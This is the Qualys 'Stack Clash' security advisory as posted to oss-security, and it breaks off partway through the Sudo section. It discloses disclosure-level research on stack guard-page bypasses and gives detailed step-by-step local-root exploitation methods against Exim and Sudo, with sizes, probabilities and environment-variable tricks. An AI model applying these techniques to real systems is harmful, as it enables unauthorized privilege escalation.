Discussion:
[oss-security] Qualys Security Advisory - The Stack Clash
Qualys Security Advisory
2017-06-19 15:28:43 UTC
Permalink
Qualys Security Advisory

The Stack Clash


========================================================================
Contents
========================================================================

I. Introduction
II. Problem
II.1. Automatic stack expansion
II.2. Stack guard-page
II.3. Stack-clash exploitation
III. Solutions
IV. Results
IV.1. Linux
IV.2. OpenBSD
IV.3. NetBSD
IV.4. FreeBSD
IV.5. Solaris
V. Acknowledgments


========================================================================
I. Introduction
========================================================================

Our research started with a 96-megabyte surprise:

b97bb000-b97dc000 rw-p 00000000 00:00 0 [heap]
bf7c6000-bf806000 rw-p 00000000 00:00 0 [stack]

and a 12-year-old question: "If the heap grows up, and the stack grows
down, what happens when they clash? Is it exploitable? How?"

- In 2005, Gael Delalleau presented "Large memory management
vulnerabilities" and the first stack-clash exploit in user-space
(against mod_php 4.3.0 on Apache 2.0.53):

http://cansecwest.com/core05/memory_vulns_delalleau.pdf

- In 2010, Rafal Wojtczuk published "Exploiting large memory management
vulnerabilities in Xorg server running on Linux", the second
stack-clash exploit in user-space (CVE-2010-2240):

http://www.invisiblethingslab.com/resources/misc-2010/xorg-large-memory-attacks.pdf

- Since 2010, security researchers have exploited several stack-clashes
in the kernel-space; for example:

https://jon.oberheide.org/blog/2010/11/29/exploiting-stack-overflows-in-the-linux-kernel/
https://jon.oberheide.org/files/infiltrate12-thestackisback.pdf
https://googleprojectzero.blogspot.com/2016/06/exploiting-recursion-in-linux-kernel_20.html

In user-space, however, this problem has been greatly underestimated;
the only public exploits are Gael Delalleau's and Rafal Wojtczuk's, and
they were written before Linux introduced a protection against
stack-clashes (a "guard-page" mapped below the stack):

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-2240

In this advisory, we show that stack-clashes are widespread in
user-space, and exploitable despite the stack guard-page; we discovered
multiple vulnerabilities in guard-page implementations, and devised
general methods for:

- "Clashing" the stack with another memory region: we allocate memory
until the stack reaches another memory region, or until another memory
region reaches the stack;

- "Jumping" over the stack guard-page: we move the stack-pointer from
the stack and into the other memory region, without accessing the
stack guard-page;

- "Smashing" the stack, or the other memory region: we overwrite the
stack with the other memory region, or the other memory region with
the stack.

To illustrate our findings, we developed the following exploits and
proofs-of-concepts:

- a local-root exploit against Exim (CVE-2017-1000369, CVE-2017-1000376)
on i386 Debian;

- a local-root exploit against Sudo (CVE-2017-1000367, CVE-2017-1000366)
on i386 Debian, Ubuntu, CentOS;

- an independent Sudoer-to-root exploit against CVE-2017-1000367 on any
SELinux-enabled distribution;

- a local-root exploit against ld.so and most SUID-root binaries
(CVE-2017-1000366, CVE-2017-1000370) on i386 Debian, Fedora, CentOS;

- a local-root exploit against ld.so and most SUID-root PIEs
(CVE-2017-1000366, CVE-2017-1000371) on i386 Debian, Ubuntu, Fedora;

- a local-root exploit against /bin/su (CVE-2017-1000366,
CVE-2017-1000365) on i386 Debian;

- a proof-of-concept that gains eip control against Sudo on i386
grsecurity/PaX (CVE-2017-1000367, CVE-2017-1000366, CVE-2017-1000377);

- a local proof-of-concept that gains rip control against Exim
(CVE-2017-1000369) on amd64 Debian;

- a local-root exploit against ld.so and most SUID-root binaries
(CVE-2017-1000366, CVE-2017-1000379) on amd64 Debian, Ubuntu, Fedora,
CentOS;

- a proof-of-concept against /usr/bin/at on i386 OpenBSD, for
CVE-2017-1000372 in OpenBSD's stack guard-page implementation and
CVE-2017-1000373 in OpenBSD's qsort() function;

- a proof-of-concept for CVE-2017-1000374 and CVE-2017-1000375 in
NetBSD's stack guard-page implementation;

- a proof-of-concept for CVE-2017-1085 in FreeBSD's setrlimit()
RLIMIT_STACK implementation;

- two proofs-of-concept for CVE-2017-1083 and CVE-2017-1084 in FreeBSD's
stack guard-page implementation;

- a local-root exploit against /usr/bin/rsh (CVE-2017-3630,
CVE-2017-3629, CVE-2017-3631) on Solaris 11.


========================================================================
II. Problem
========================================================================

Note: in this advisory, the "start of the stack" is the lowest address
of its memory region, and the "end of the stack" is the highest address
of its memory region; we do not use the ambiguous terms "top of the
stack" and "bottom of the stack".

========================================================================
II.1. Automatic stack expansion
========================================================================

The user-space stack of a process is automatically expanded by the
kernel:

- if the stack-pointer (the esp register, on i386) reaches the start of
the stack and the unmapped memory pages below (the stack grows down,
on i386),

- then a "page-fault" exception is raised and caught by the kernel,

- and the page-fault handler transparently expands the user-space stack
of the process (it decreases the start address of the stack),

- or it terminates the process with a SIGSEGV if the stack expansion
fails (for example, if the RLIMIT_STACK is reached).

Unfortunately, this stack expansion mechanism is implicit and fragile:
it relies on page-fault exceptions, but if another memory region is
mapped directly below the stack, then the stack-pointer can move from
the stack into the other memory region without raising a page-fault,
and:

- the kernel cannot tell that the process needed more stack memory;

- the process cannot tell that its stack-pointer moved from the stack
into another memory region.

In contrast, the heap expansion mechanism is explicit and robust: the
process uses the brk() system-call to tell the kernel that it needs more
heap memory, and the kernel expands the heap accordingly (it increases
the end address of the heap memory region -- the heap always grows up).

========================================================================
II.2. Stack guard-page
========================================================================

The fragile stack expansion mechanism poses a security threat: if the
stack-pointer of a process can move from the stack into another memory
region (which ends exactly where the stack starts) without raising a
page-fault, then:

- the process uses this other memory region as if it were an extension
of the stack;

- a write to this stack extension smashes the other memory region;

- a write to the other memory region smashes the stack extension.

To protect against this security threat, the kernel maps a "guard-page"
below the start of the stack: one or more PROT_NONE pages (or unmappable
pages) that:

- raise a page-fault exception if accessed (before the stack-pointer can
move from the stack into another memory region);

- terminate the process with a SIGSEGV (because the page-fault handler
cannot expand the stack if another memory region is mapped directly
below).

Unfortunately, a stack guard-page of a few kilobytes is insufficient
(CVE-2017-1000364): if the stack-pointer "jumps" over the guard-page --
if it moves from the stack into another memory region without accessing
the guard-page -- then no page-fault exception is raised and the stack
extends into the other memory region.

This theoretical vulnerability was first described in Gael Delalleau's
2005 presentation (slides 24-29). In the present advisory, we discuss
its practicalities, and multiple vulnerabilities in stack guard-page
implementations (in OpenBSD, NetBSD, and FreeBSD), but we exclude
related vulnerabilities such as unbounded alloca()s and VLAs
(Variable-Length Arrays) that have been exploited in the past:

http://phrack.org/issues/63/14.html
http://blog.exodusintel.com/2013/01/07/who-was-phone/

========================================================================
II.3. Stack-clash exploitation
========================================================================

Must be a clash, there's no alternative.
--The Clash, "Kingston Advice"

Our exploits follow a series of four sequential steps -- each step
allocates memory that must not be freed before all steps are complete:

Step 1: Clash (the stack with another memory region)
Step 2: Run (move the stack-pointer to the start of the stack)
Step 3: Jump (over the stack guard-page, into the other memory region)
Step 4: Smash (the stack, or the other memory region)

========================================================================
II.3.1. Step 1: Clash the stack with another memory region
========================================================================

Have the boys found the leak yet?
--The Clash, "The Leader"

Allocate memory until the start of the stack reaches the end of another
memory region, or until the end of another memory region reaches the
start of the stack.

- The other memory region can be, for example:
. the heap;
. an anonymous mmap();
. the read-write segment of ld.so;
. the read-write segment of a PIE, a Position-Independent Executable.

- The memory allocated in this Step 1 can be, for example:
. stack and heap memory;
. stack and anonymous mmap() memory;
. stack memory only.

- The heap and anonymous mmap() memory can be:

. temporarily allocated, but not freed before the stack guard-page is
jumped over in Step 3 and memory is smashed in Step 4;

. permanently leaked. On Linux, a general method for allocating
anonymous mmap()s is the LD_AUDIT memory leak that we discovered in
the ld.so part of the glibc, the GNU C Library (CVE-2017-1000366).

- The stack memory can be allocated, for example:

. through megabytes of command-line arguments and environment
variables.

On Linux, this general method for allocating stack memory is limited
by the kernel to 1/4 of the current RLIMIT_STACK (1GB on i386 if
RLIMIT_STACK is RLIM_INFINITY -- man execve, "Limits on size of
arguments and environment").

However, as we were drafting this advisory, we realized that the
kernel imposes this limit on the argument and environment strings,
but not on the argv[] and envp[] pointers to these strings, and we
developed alternative versions of our Linux exploits that do not
depend on application-specific memory leaks (CVE-2017-1000365).

. through recursive function calls.

On BSD, we discovered a general method for allocating megabytes of
stack memory: a vulnerability in qsort() that causes this function
to recurse N/4 times, given a pathological input array of N elements
(CVE-2017-1000373 in OpenBSD, CVE-2017-1000378 in NetBSD, and
CVE-2017-1082 in FreeBSD).

- In a few rare cases, Step 1 is not needed, because another memory
region is naturally mapped directly below the stack (for example,
ld.so in our Solaris exploit).

========================================================================
II.3.2. Step 2: Move the stack-pointer to the start of the stack
========================================================================

Run, run, run, run, run, don't you know?
--The Clash, "Three Card Trick"

Consume the unused stack memory that separates the stack-pointer from
the start of the stack. This Step 2 is similar to Step 3 ("Jump over the
stack guard-page") but is needed because:

- the stack-pointer is usually several kilobytes higher than the start
of the stack (functions that allocate a large stack-frame decrease the
start address of the stack, but this address is never increased
again); moreover:

. the FreeBSD kernel automatically expands the user-space stack of a
process by multiples of 128KB (SGROWSIZ, in vm_map_growstack());

. the Linux kernel initially expands the user-space stack of a process
by 128KB (stack_expand, in setup_arg_pages()).

- in Step 3, the stack-based buffer used to jump over the guard-page:

. is usually not large enough to simultaneously move the stack-pointer
to the start of the stack, and then into another memory region;

. must not be fully written to (a full write would access the stack
guard-page and terminate the process) but the stack memory consumed
in this Step 2 can be fully written to (for example, strdupa() can
be used in Step 2, but not in Step 3).

The stack memory consumed in this Step 2 can be, for example:

- large stack-frames, alloca()s, or VLAs (which can be detected by
grsecurity/PaX's STACKLEAK plugin for GCC,
https://grsecurity.net/features.php);

- recursive function calls (which can be detected by GNU cflow,
http://www.gnu.org/software/cflow/);

- on Linux, we discovered that the argv[] and envp[] arrays of pointers
can be used to consume the 128KB of initial stack expansion, because
the kernel allocates these arrays on the stack long after the call to
setup_arg_pages(); this general method for completing Step 2 is
exploitable locally, but the initial stack expansion poses a major
obstacle to the remote exploitation of stack-clashes, as mentioned in
IV.1.1.

In a few rare cases, Step 2 is not needed, because the stack-pointer is
naturally close to the start of the stack (for example, in Exim's main()
function, the 256KB group_list[] moves the stack-pointer to the start of
the stack and beyond).

========================================================================
II.3.3. Step 3: Jump over the stack guard-page, into another memory
region
========================================================================

You need a little jump of electrical shockers.
--The Clash, "Clash City Rockers"

Move the stack-pointer from the stack and into the memory region that
clashed with the stack in Step 1, but without accessing the guard-page.
To complete this Step 3, a large stack-based buffer, alloca(), or VLA is
needed, and:

- it must be larger than the guard-page;

- it must end in the stack, above the guard-page;

- it must start in the memory region below the stack guard-page;

- it must not be fully written to (a full write would access the
guard-page, raise a page-fault exception, and terminate the process,
because the memory region mapped directly below the stack prevents the
page-fault handler from expanding the stack).

In a few cases, Step 3 is not needed:

- on FreeBSD, a stack guard-page is implemented but disabled by default
(CVE-2017-1083);

- on OpenBSD, NetBSD, and FreeBSD, we discovered implementation
vulnerabilities that eliminate the stack guard-page (CVE-2017-1000372,
CVE-2017-1000374, CVE-2017-1084).

On Linux, we devised general methods for jumping over the stack
guard-page (CVE-2017-1000366):

- The glibc's __dcigettext() function alloca()tes single_locale, a
stack-based buffer of up to 128KB (MAX_ARG_STRLEN, man execve), the
length of the LANGUAGE environment variable (if the current locale is
neither "C" nor "POSIX", but distributions install default locales
such as "C.UTF-8" and "en_US.utf8").

If LANGUAGE is mostly composed of ':' characters, then single_locale
is barely written to, and can be used to jump over the stack
guard-page.

Moreover, if __dcigettext() finds the message to be translated, then
_nl_find_msg() strdup()licates the OUTPUT_CHARSET environment variable
and allows a local attacker to immediately smash the stack and gain
control of the instruction pointer (the eip register, on i386), as
detailed in Step 4a.

We exploited this stack-clash against Sudo and su, but most of the
SUID (set-user-ID) and SGID (set-group-ID) binaries that call
setlocale(LC_ALL, "") and __dcigettext() or its derivatives (the
*gettext() functions, the _() convenience macro, the strerror()
function) are exploitable.

- The glibc's vfprintf() function (called by the *printf() family of
functions) alloca()tes a stack-based work buffer of up to 64KB
(__MAX_ALLOCA_CUTOFF) if a width or precision is greater than 1KB
(WORK_BUFFER_SIZE).

If the corresponding format specifier is %s then this work buffer is
never written to and can be used to jump over the stack guard-page.

None of our exploits is based on this method, but it was one of our
ideas to exploit Exim remotely, as mentioned in IV.1.1.

- The glibc's getaddrinfo() function calls gaih_inet(), which
alloca()tes tmpbuf, a stack-based buffer of up to 64KB
(__MAX_ALLOCA_CUTOFF) that may be used to jump over the stack
guard-page.

Moreover, gaih_inet() calls the gethostbyname*() functions, which
malloc()ate a heap-based DNS response of up to 64KB (MAXPACKET) that
may allow a remote attacker to immediately smash the stack, as
detailed in Step 4a.

None of our exploits is based on this method, but it may be the key to
the remote exploitation of stack-clashes.

- The glibc's run-time dynamic linker ld.so alloca()tes llp_tmp, a
stack-based copy of the LD_LIBRARY_PATH environment variable. If
LD_LIBRARY_PATH contains Dynamic String Tokens (DSTs), they are first
expanded: llp_tmp can be larger than 128KB (MAX_ARG_STRLEN) and not
fully written to, and can therefore be used to jump over the stack
guard-page and smash the memory region mapped directly below, as
detailed in Step 4b.

We exploited this ld.so stack-clash in two data-only attacks that
bypass NX (No-eXecute) and ASLR (Address Space Layout Randomization)
and obtain a privileged shell through most SUID and SGID binaries on
most i386 Linux distributions.

- Several local and remote applications allocate a 256KB stack-based
"gid_t buffer[NGROUPS_MAX];" that is not fully written to and can be
used to move the stack-pointer to the start of the stack (Step 2) and
jump over the guard-page (Step 3). For example, Exim's main() function
and older versions of util-linux's su.

None of our exploits is based on this method, but an experimental
version of our Exim exploit unexpectedly gained control of eip after
the group_list[] buffer had jumped over the stack guard-page.

========================================================================
II.3.4. Step 4: Either smash the stack with another memory region (Step
4a) or smash another memory region with the stack (Step 4b)
========================================================================

Smash and grab, it's that kind of world.
--The Clash, "One Emotion"

In Step 3, a function allocates a large stack-based buffer and jumps
over the stack guard-page into the memory region mapped directly below;
in Step 4, before this function returns and jumps back into the stack:

- Step 4a: a write to the memory region mapped below the stack (where
esp still points to) effectively smashes the stack. We exploit this
general method for completing Step 4 in Exim, Sudo, and su:

. we overwrite a return-address on the stack and gain control of eip;

. we return-into-libc (into system() or __libc_dlopen()) to defeat NX;

. we brute-force ASLR (8 bits of entropy) if CVE-2016-3672 is patched;

. we bypass SSP (Stack-Smashing Protector) because we overwrite the
return-address of a function that is not protected by a stack canary
(the memcpy() that smashes the stack usually overwrites its own
stack-frame and return-address).

- Step 4b: a write to the stack effectively smashes the memory region
mapped below (where esp still points to). This second method for
completing Step 4 is application-specific (it depends on the contents
of the memory region that we smash) unless we exploit the run-time
dynamic linker ld.so:

. on Solaris, we devised a general method for smashing ld.so's
read-write segment, overwriting one of its function pointers, and
executing our own shell-code;

. on Linux, we exploited most SUID and SGID binaries through ld.so:
our "hwcap" exploit smashes an mmap()ed string, and our ".dynamic"
exploit smashes a PIE's read-write segment before it is mprotect()ed
read-only by Full RELRO (Full RELocate Read-Only -- GNU_RELRO and
BIND_NOW).


========================================================================
III. Solutions
========================================================================

Based on our research, we recommend that the affected operating systems:

- Increase the size of the stack guard-page to at least 1MB, and allow
system administrators to easily modify this value (for example,
grsecurity/PaX introduced /proc/sys/vm/heap_stack_gap in 2010).

This first, short-term solution is cheap, but it can be defeated by a
very large stack-based buffer.

- Recompile all userland code (ld.so, libraries, binaries) with GCC's
"-fstack-check" option, which prevents the stack-pointer from moving
into another memory region without accessing the stack guard-page (it
writes one word to every 4KB page allocated on the stack).

This second, long-term solution is expensive, but it cannot be
defeated (even if the stack guard-page is only 4KB, one page) --
unless a vulnerability is discovered in the implementation of the
stack guard-page or the "-fstack-check" option.


========================================================================
IV. Results
========================================================================

========================================================================
IV.1. Linux
========================================================================

========================================================================
IV.1.1. Exim
========================================================================

Debian 8.5

Crude exploitation

Our first exploit, a Local Privilege Escalation against Exim's SUID-root
PIE (Position-Independent Executable) on i386 Debian 8.5, simply follows
the four sequential steps outlined in II.3.

Step 1: Clash the stack with the heap

To reach the start of the stack with the end of the heap (man brk), we
permanently leak memory through multiple -p command-line arguments that
are malloc()ated by Exim but never free()d (CVE-2017-1000369) -- we call
such a malloc()ated chunk of heap memory a "memleak-chunk".

Because the -p argument strings are originally allocated on the stack by
execve(), we must cover half of the initial heap-stack distance (between
the start of the heap and the end of the stack) with stack memory, and
half of this distance with heap memory.

If we set the RLIMIT_STACK to 136MB (MIN_GAP, arch/x86/mm/mmap.c) then
the initial heap-stack distance is minimal (randomized in a [96MB,137MB]
range), but we cannot reach the stack with the heap because of the 1/4
limit imposed by the kernel on the argument and environment strings (man
execve): 136MB/4=34MB of -p argument strings cannot cover 96MB/2=48MB,
half of the minimum heap-stack distance.

Moreover, if we increase the RLIMIT_STACK, the initial heap-stack
distance also increases and we still cannot reach the stack with the
heap. However, if we set the RLIMIT_STACK to RLIM_INFINITY (4GB on i386)
then the kernel switches from the default top-down mmap() layout to a
legacy bottom-up mmap() layout, and:

- the initial heap-stack distance is approximately 2GB, because the
start of the heap (the initial brk()) is randomized above the address
0x40000000, and the end of the stack is randomized below the address
0xC0000000;

- we can reach the stack with the heap, despite the 1/4 limit imposed by
the kernel on the argument and environment strings, because 4GB/4=1GB
of -p argument strings can cover 2GB/2=1GB, half of the initial
heap-stack distance;

- we clash the stack with the heap around the address 0x80000000.

Step 2: Move the stack-pointer (esp) to the start of the stack

The 256KB stack-based group_list[] in Exim's main() naturally consumes
the 128KB of initial stack expansion, as mentioned in II.3.2.

Step 3: Jump over the stack guard-page and into the heap

To move esp from the start of the stack into the heap, without accessing
the stack guard-page, we use a malformed -d command-line argument that
is written to the 32KB (STRING_SPRINTF_BUFFER_SIZE) stack-based buffer
in Exim's string_sprintf() function. This buffer is not fully written to
and hence does not access the stack guard-page, because our -d argument
string is much shorter than 32KB.

Step 4a: Smash the stack with the heap

Before string_sprintf() returns (and moves esp from the heap back into
the stack) it calls string_copy(), which malloc()ates and memcpy()es our
-d argument string to the end of the heap, where esp still points to --
we call this malloc()ated chunk of heap memory the "smashing-chunk".

This call to memcpy() therefore smashes its own stack-frame (which is
not protected by SSP) with the contents of our smashing-chunk, and we
overwrite memcpy()'s return-address with the address of libc's system()
function (which is not randomized by ASLR because Debian 8.5 is
vulnerable to CVE-2016-3672):

- instead of smashing memcpy()'s stack-frame with an 8-byte pattern (the
return-address to system() and its argument) we smash it with a simple
4-byte pattern (the return-address to system()), append "." to the
PATH environment variable, and symlink() our exploit to the string
that begins at the address of libc's system() function;

- system() does not drop our escalated root privileges, because Debian's
/bin/sh is dash, not bash and its -p option (man bash).

This first version of our Exim exploit obtained a root-shell after
nearly a week of failed attempts; to improve this result, we analyzed
every step of a successful run.

Refined exploitation

Step 1: Clash the stack with the heap

+ The heap must be able to reach the stack [Condition 1]

The start of the heap is randomized in the 32MB range above the end of
Exim's PIE (the end of its .bss section), but the growth of the heap is
sometimes blocked by libraries that are mmap()ed within the same range
(because of the legacy bottom-up mmap() layout). On Debian 8.5, Exim's
libraries occupy about 8MB and thus block the growth of the heap with a
probability of 8MB/32MB = 1/4.

When the heap is blocked by the libraries, malloc() switches from brk()
to mmap()s of 1MB (MMAP_AS_MORECORE_SIZE), and our memory leak reaches
the stack with mmap()s instead of the heap. Such a stack-clash is also
exploitable, but its probability of success is low, as detailed in
IV.1.6., and we therefore discarded this approach.

+ The heap must always reach the stack, when not blocked by libraries

Because the initial heap-stack distance (between the start of the heap
and the end of the stack) is a random variable:

- either we allocate the exact amount of heap memory to cover the mean
heap-stack distance, but the probability of success of this approach
is low and we therefore discarded it;

- or we allocate enough heap memory to always reach the stack, even when
the initial heap-stack distance is maximal; after the heap reaches the
stack, our memory leak allocates mmap()s of 1MB above the stack (below
0xC0000000) and below the heap (above the libraries), but it must not
exhaust the address-space (the 1GB below 0x40000000 is unmappable);

- the final heap-stack distance (between the end of the heap and the
start of the stack) is also a random variable:

. its minimum value is 8KB (the stack guard-page, plus a safety page
imposed by the brk() system-call in mm/mmap.c);

. its maximum value is roughly the size of a memleak-chunk, plus 128KB
(DEFAULT_TOP_PAD, malloc/malloc.c).

Step 3: Jump over the stack guard-page and into the heap

- The stack-pointer must jump over the guard-page and land into the free
chunk at the end of the heap (the remainder of the heap after malloc()
switches from brk() to mmap()), where both the smashing-chunk and
memcpy()'s stack-frame are allocated and overwritten in Step 4a
[Condition 2];

- The write (of approximately smashing-chunk bytes) to
string_sprintf()'s stack-based buffer (which starts where the
guard-page jump lands) must not crash into the end of the heap
[Condition 3].

Step 4a: Smash the stack with the heap

The smashing-chunk must be allocated into the free chunk at the end of
the heap:

- the smashing-chunk must not be allocated into the free chunks left
over at the end of the 1MB mmap()s [Condition 4];

- the memleak-chunks must not be allocated into the free chunk at the
end of the heap [Condition 5].

Intuitively, the probability of gaining control of eip depends on the
size of the smashing-chunk (the guard-page jump's landing-zone) and the
size of the memleak-chunks (which determines the final heap-stack
distance).

To maximize this probability, we wrote a helper program that imposes the
following conditions on the smashing-chunk and memleak-chunks:

- the smashing-chunk must be smaller than 32KB
(STRING_SPRINTF_BUFFER_SIZE) [Condition 3];

- the memleak-chunks must be smaller than 128KB (DEFAULT_MMAP_THRESHOLD,
malloc/malloc.c);

- the free chunk at the end of the heap must be larger than twice the
smashing-chunk size [Conditions 2 and 3];

- the free chunk at the end of the heap must be smaller than the
memleak-chunk size [Condition 5];

- when the final heap-stack distance is minimal, the 32KB
(STRING_SPRINTF_BUFFER_SIZE) guard-page jump must land below the free
chunk at the end of the heap [Condition 2];

- the free chunks at the end of the 1MB mmap()s must be:

. either smaller than the smashing-chunk [Condition 4];

. or larger than the free chunk at the end of the heap (glibc's
malloc() is a best-fit allocator) [Condition 4].

The resulting smashing-chunk and memleak-chunk sizes are:

smash: 10224 memleak: 27656 brk_min: 20464 brk_max: 24552 mmap_top: 25304
probability: 1/16 (0.06190487817)

In theory, the probability of gaining control of eip is 1/21: the
product of the 1/16 probability calculated by this helper program
(approximately (smashing-chunk / (memleak-chunk + DEFAULT_TOP_PAD))) and
the 3/4 probability of reaching the stack with the heap [Condition 1].

In practice, on Debian 8.5, our final Exim exploit:

- gains eip control in 1 run out of 28, on average;

- takes 2.5 seconds per run (on a 4GB Virtual Machine);

- has a good chance of obtaining a root-shell after 28*2.5 = 70 seconds;

- uses 4GB of memory (2GB in the Exim process, and 2GB in the process
fork()ed by system()).

Debian 8.6

Unlike Debian 8.5, Debian 8.6 is not vulnerable to CVE-2016-3672: after
gaining eip control in Step 4a (Smash), the probability of successfully
returning-into-libc's system() function is 1/256 (8 bits of entropy --
libraries are randomized in a 1MB range but aligned on 4KB).

Consequently, our final Exim exploit has a good chance of obtaining a
root-shell on Debian 8.6 after 256*28*2.5 seconds = 5 hours (256*28=7168
runs).

As we were drafting this advisory, we tried an alternative approach
against Exim on Debian 8.6: we discovered that its stack is executable,
because it depends on libgnutls-deb0, which depends on libp11-kit, which
depends on libffi, which incorrectly requires an executable GNU_STACK
(CVE-2017-1000376).

Initially, we discarded this approach because our 1GB of -p argument
strings on the stack is not executable (_dl_make_stack_executable() only
mprotect()s the stack below argv[] and envp[]):

41e00000-723d7000 rw-p 00000000 00:00 0 [heap]
802f1000-80334000 rwxp 00000000 00:00 0 [stack]
80334000-bfce6000 rw-p 00000000 00:00 0

and because the stack is randomized in an 8MB range but we do not
control the contents of any large buffer on the executable stack.

Later, we discovered that two 128KB (MAX_ARG_STRLEN) copies of the
LD_PRELOAD environment variable can be allocated onto the executable
stack by ld.so's dl_main() and open_path() functions, automatically
freed upon return from these functions, and re-allocated (but not
overwritten) by Exim's 256KB stack-based group_list[].

In theory, the probability of returning into our shell-code (into these
executable copies of LD_PRELOAD) is 1/32 (2*128KB/8MB), higher than the
1/256 probability of returning-into-libc. In practice, this alternative
Exim exploit has a good chance of obtaining a root-shell after 1174 runs
-- instead of 32*28=896 runs in theory, because the two 128KB copies of
LD_PRELOAD are never perfectly aligned with Exim's 256KB group_list[] --
or 1174*2.5 seconds = 50 minutes.

Debian 9 and 10

Unlike Debian 8, Debian 9 and 10 are not vulnerable to offset2lib, a
minor weakness in Linux's ASLR that coincidentally affects Step 1
(Clash) of our stack-clash exploits:

https://cybersecurity.upv.es/attacks/offset2lib/offset2lib.html
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d1fd836dcf00d2028c700c7e44d2c23404062c90

If we set RLIMIT_STACK to RLIM_INFINITY, the kernel still switches to
the legacy bottom-up mmap() layout, and the libraries are randomized in
the 1MB range above the address 0x40000000, but Exim's PIE is randomized
in the 1MB range above the address 0x80000000 and the heap is randomized
in the 32MB range above the PIE's .bss section. As a result:

- the heap is always able to reach the stack, because its growth is
never blocked by the libraries -- the theoretical probability of
gaining eip control is 1/16, the probability calculated by our helper
program;

- the heap clashes with the stack around the address 0xA0000000, because
the initial heap-stack distance is 1GB (0xC0000000-0x80000000) and can
be covered with 512MB of heap memory and 512MB of stack memory.

Remote exploitation

Exim's string_sprintf() or glibc's vfprintf() can be used to remotely
complete Steps 3 and 4 of the stack-clash; and the 256KB group_list[] in
Exim's main() naturally consumes the 128KB of initial stack expansion in
Step 2; but another 256KB group_list[] in Exim's exim_setugid() further
decreases the start address of the stack and prevents us from remotely
completing Step 2 and exploiting Exim.

========================================================================
IV.1.2. Sudo
========================================================================

Introduction

We discovered a vulnerability in Sudo's get_process_ttyname() for Linux:
this function opens "/proc/[pid]/stat" (man proc) and reads the device
number of the tty from field 7 (tty_nr). Unfortunately, these fields are
space-separated and field 2 (comm, the filename of the command) can
contain spaces (CVE-2017-1000367).

For example, if we execute Sudo through the symlink "./ 1 ",
get_process_ttyname() calls sudo_ttyname_dev() to search for the
non-existent tty device number "1" in the built-in search_devs[].

Next, sudo_ttyname_dev() calls the recursive function
sudo_ttyname_scan() to search for this non-existent tty device number
"1" in a breadth-first traversal of "/dev".

Last, we exploit this recursive function during its traversal of the
world-writable "/dev/shm", and allocate hundreds of megabytes of heap
memory from the filesystem (directory pathnames) instead of the stack
(the command-line arguments and environment variables allocated by our
other stack-clash exploits).

Step 1: Clash the stack with the heap

sudo_ttyname_scan() strdup()licates the pathnames of the directories and
sub-directories that it traverses, but does not free() them until it
returns. Each one of these "memleak-chunks" allocates at most 4KB
(PATH_MAX) of heap memory.

Step 2: Move the stack-pointer to the start of the stack

The recursive calls to sudo_ttyname_scan() allocate 4KB (PATH_MAX)
stack-frames that naturally consume the 128KB of initial stack
expansion.

Step 3: Jump over the stack guard-page and into the heap

If the length of a directory pathname reaches 4KB (PATH_MAX),
sudo_ttyname_scan() calls warning(), which calls strerror() and _(),
which call gettext() and allow us to jump over the stack guard-page with
an alloca() of up to 128KB (the LANGUAGE environment variable), as
explained in II.3.3.

Step 4a: Smash the stack with the heap

The self-contained gettext() exploitation method malloc()ates and
memcpy()es a "smashing-chunk" of up to 128KB (the OUTPUT_CHARSET
environment variable) that smashes memcpy()'s stack-frame and
return-address, as explained in II.3.4.

Debian 8.5

Step 1: Clash the stack with the heap

Debian 8.5 is vulnerable to CVE-2016-3672: if we set RLIMIT_STACK to
RLIM_INFINITY, the kernel switches to the legacy bottom-up mmap() layout
and disables the ASLR of Sudo's PIE and libraries, but still the initial
heap-stack distance is randomized and roughly 2GB (0xC0000000-0x40000000
-- the start of the heap is randomized in a 32MB range above 0x40000000,
and the end of the stack is randomized in the 8MB range below
0xC0000000).

To reach the start of the stack with the end of the heap, we allocate
hundreds of megabytes of heap memory from the filesystem (directory
pathnames), and:

- the heap must be able to reach the stack -- on Debian 8.5, Sudo's
libraries occupy about 3MB and hence block the growth of the heap with
a probability of 3MB/32MB ~= 1/11;

- when not blocked by the libraries, the heap must always reach the
stack, even when the initial heap-stack distance is maximal (as
detailed in IV.1.1.);

- we cover half of the initial heap-stack distance with 1GB of heap
memory (the memleak-chunks, strdup()licated directory pathnames);

- we cover the other half of this distance with 1GB of stack memory (the
maximum permitted by the kernel's 1/4 limit on the argument and
environment strings) and thus reduce our on-disk inode usage;

- we redirect sudo_ttyname_scan()'s traversal of /dev to /var/tmp
(through a symlink planted in /dev/shm) to work around the small
number of inodes available in /dev/shm.

After the heap reaches the stack and malloc() switches from brk() to
mmap()s of 1MB:

- the size of the free chunk left over at the end of the heap is a
random variable in the [0B,4KB] range -- 4KB (PATH_MAX) is the
approximate size of a memleak-chunk;

- the final heap-stack distance (between the end of the heap and the
start of the stack) is a random variable in the [8KB,4KB+128KB=132KB]
range -- the size of a memleak-chunk plus 128KB (DEFAULT_TOP_PAD);

- sudo_ttyname_scan() recurses a few more times and therefore allocates
more stack memory, but this stack expansion is blocked by the heap and
crashes into the stack guard-page after 16 recursions on average
(132KB/4KB/2, where 132KB is the maximum final heap-stack distance,
and 4KB is the size of sudo_ttyname_scan()'s stack-frame).

To solve this unexpected problem, we:

- first, redirect sudo_ttyname_scan() to a directory tree "A" in
/var/tmp that recurses and allocates stack memory, but does not
allocate heap memory (each directory level contains only one entry,
the sub-directory that is connected to the next directory level);

- second, redirect sudo_ttyname_scan() to a directory tree "B" in
/var/tmp that recurses and allocates heap memory (each directory level
contains many entries), but does not allocate more stack memory (it
simply consumes the stack memory that was already allocated by the
directory tree "A"): it does not further expand the stack, and does
not crash into the guard-page.

Finally, we increase the speed of our exploit and avoid thousands of
useless recursions:

- in each directory level traversed by sudo_ttyname_scan(), we randomly
modify the names of its sub-directories until the first call to
readdir() returns the only sub-directory that is connected to the next
level of the directory tree (all other sub-directories allocate heap
memory but are otherwise empty);

- we dup2() Sudo's stdout and stderr to a pipe with no readers that
terminates Sudo with a SIGPIPE if sudo_ttyname_scan() calls warning()
and sudo_printf() (a failed exploit attempt, usually because the final
heap-stack distance is much longer or shorter than the guard-page
jump).

Step 2: Move the stack-pointer to the start of the stack

sudo_ttyname_scan() allocates a 4KB (PATH_MAX) stack-based pathbuf[]
that naturally consumes the 128KB of initial stack expansion in fewer
than 128KB/4KB=32 recursive calls.

The recursive calls to sudo_ttyname_scan() allocate less than 8MB of
stack memory: the maximum number of recursions (PATH_MAX / strlen("/a")
= 2K) multiplied by the size of sudo_ttyname_scan()'s stack-frame (4KB).

Step 3: Jump over the stack guard-page and into the heap

